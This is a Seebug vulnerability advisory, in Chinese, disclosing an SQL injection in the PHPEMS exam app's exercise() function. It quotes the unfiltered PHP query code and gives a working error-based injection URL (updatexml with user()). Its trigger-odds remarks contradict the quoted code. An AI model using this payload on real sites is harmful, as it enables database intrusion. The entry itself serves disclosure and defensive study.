PHPEMS一处SQL注入漏洞

2015-03-12T00:00:00
ID SSV:95883
Type seebug
Reporter Root
Modified 2015-03-12T00:00:00

Description

简要描述:

PHPEMS一处SQL注入漏洞

详细说明:

6.phpems某处存在SQL注入漏洞 存在注入漏洞的代码位置是/app/exam/app.php的exercise()函数中 具体代码在靠后的位置928行左右 $questionids = $this->question->selectQuestionsByKnows($args['knowsid'],$args['number'],$dt);//SQL注入漏洞 这里的参数$args['knowsid'] 回溯898行$args = $this->ev->get('args');可以从URL控制 然后进入函数 public function selectQuestionsByKnows($knowsid,$qt) { $knowsids = $knowsid; foreach($qt as $key => $t) { $par = 0; if(!$par) { $par++; $trand = rand(1,4); if($trand < 3) { $qrs = $this->getRandQuestionRowsList(array("quest2knows.qkknowsid IN ({$knowsids})","questionrows.qrtype = '{$key}'","questionrows.qrnumber <= '{$t}'")); if(count($qrs)) { $qrid = $qrs[array_rand($qrs,1)]; $questionrow[$key][] = $qrid; $qr = $this->exam->getQuestionRowsByArgs("qrid = '{$qrid}'"); $t = intval($t - $qr['qrnumber']); } 没有经过过滤,直接参与组成语句执行!验证之 注册用户登录之访问如下链接 localhost/ems/index.php?exam-app-exercise&setExecriseConfig=1&args[knowsid]=1,updatexml(1,user(),1)&args[number][1]=2

<img src="https://images.seebug.org/upload/201503/1218431248e2a1b68f418e6414af95af6e2ce380.png" alt="bbb.png" width="600" onerror="javascript:errimg(this);">

OK!没有任何问题!值得一说的,在执行过程中,里面有个函数放了一个rand(1,4)只有返回结果大于3才能触发这个漏洞,所以如果一次没有触发,可以多次刷新验证,理论上,75%的首次刷出率,哈哈

漏洞证明:

注册用户登录之访问如下链接 localhost/ems/index.php?exam-app-exercise&setExecriseConfig=1&args[knowsid]=1,updatexml(1,user(),1)&args[number][1]=2

<img src="https://images.seebug.org/upload/201503/1218431248e2a1b68f418e6414af95af6e2ce380.png" alt="bbb.png" width="600" onerror="javascript:errimg(this);">

OK!没有任何问题!值得一说的,在执行过程中,里面有个函数放了一个rand(1,4)只有返回结果大于3才能触发这个漏洞,所以如果一次没有触发,可以多次刷新验证,理论上,75%的首次刷出率,哈哈